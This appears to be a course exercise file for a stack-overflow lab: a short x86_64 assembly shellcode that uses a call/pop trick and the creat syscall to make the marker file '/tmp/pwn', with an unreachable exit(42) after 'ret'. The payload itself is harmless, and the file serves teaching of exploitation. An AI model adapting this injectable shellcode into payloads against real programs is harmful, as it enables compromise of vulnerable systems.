cours/content/secu_logicielle/td5-stackoverflow_shellcode/files/q3/shellcode.S

20 lines
268 B
ArmAsm

.text
.globl _start
_start:
call pwnd
.asciz "/tmp/pwn"
pwnd:
# We are on x86_64, we must move 8 bytes up from stack pointer
popq %rdi
movq $0666, %rsi
movq $85, %rax
syscall
ret
# exit(42)
movq $42, %rdi
movq $60, %rax
syscall